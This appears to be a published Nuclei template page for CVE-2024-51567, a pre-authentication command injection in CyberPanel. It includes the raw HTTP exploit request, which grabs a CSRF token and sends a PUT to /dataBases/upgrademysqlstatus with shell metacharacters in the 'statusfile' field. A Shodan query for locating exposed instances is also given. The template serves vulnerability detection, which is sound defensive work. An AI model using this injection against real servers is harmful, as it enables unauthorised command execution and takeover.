CyberPanel v2.3.6 Pre-Auth Remote Code Execution

ID: CVE-2024-51567

Severity: critical

Author: DhiyaneshDK

Tags: cve,cve2024,cyberpanel,rce,intrusive,kev

Description

upgrademysqlstatus in databases/views.py in CyberPanel (aka Cyber Panel) before 5b08cd6 allows remote attackers to bypass authentication and execute arbitrary commands via /dataBases/upgrademysqlstatus by bypassing secMiddleware (which is only for a POST request) and using shell metacharacters in the statusfile property, as exploited in the wild in October 2024 by PSAUX. Versions through 2.3.6 and (unpatched) 2.3.7 are affected.

YAML Source

id: CVE-2024-51567

info:
  name: CyberPanel v2.3.6 Pre-Auth Remote Code Execution
  author: DhiyaneshDK
  severity: critical
  description: |
    upgrademysqlstatus in databases/views.py in CyberPanel (aka Cyber Panel) before 5b08cd6 allows remote attackers to bypass authentication and execute arbitrary commands via /dataBases/upgrademysqlstatus by bypassing secMiddleware (which is only for a POST request) and using shell metacharacters in the statusfile property, as exploited in the wild in October 2024 by PSAUX. Versions through 2.3.6 and (unpatched) 2.3.7 are affected.
  impact: Attackers can exploit this vulnerability by crafting malicious requests that bypass authentication controls, allowing them to inject and execute arbitrary commands on the underlying server.
  reference:
    - https://community.cyberpanel.net/t/cyberpanel-2-1-remote-code-execution-rce/31760
    - https://dreyand.rs/code/review/2024/10/27/what-are-my-options-cyberpanel-v236-pre-auth-rce
    - https://cwe.mitre.org/data/definitions/420.html
    - https://cwe.mitre.org/data/definitions/78.html
    - https://cyberpanel.net/KnowledgeBase/home/change-logs/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2024-51567
    cwe-id: CWE-306
    epss-score: 0.36703
    epss-percentile: 0.97306
    cpe: cpe:2.3:a:cyberpanel:cyberpanel:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: cyberpanel
    product: cyberpanel
    shodan-query: html:"CyberPanel"
  tags: cve,cve2024,cyberpanel,rce,intrusive,kev
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

      - |
        PUT /dataBases/upgrademysqlstatus HTTP/1.1
        Host: {{Hostname}}
        X-CSRFToken: {{csrftoken}}
        Content-Type: application/json
        Referer: {{RootURL}}
        Cookie: csrftoken={{csrftoken}}

        {"statusfile":"/dev/null; id; #","csrftoken":"{{csrftoken}}"}

    extractors:
      - type: regex
        part: header
        name: csrftoken
        internal: true
        group: 1
        regex:
          - csrftoken=([A-Za-z0-9]+)

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "uid="
          - "error_message"
          - "requestStatus"
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100da3a7c969d98a83b24a1f08206987db4ec69efdaa258937c41662138add9e70a022100c3dc88a5567b92e503c20ee37d2817b415a5eb09d15e4bdb14e7c428b531f2b3:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-51567.yaml"

View on Github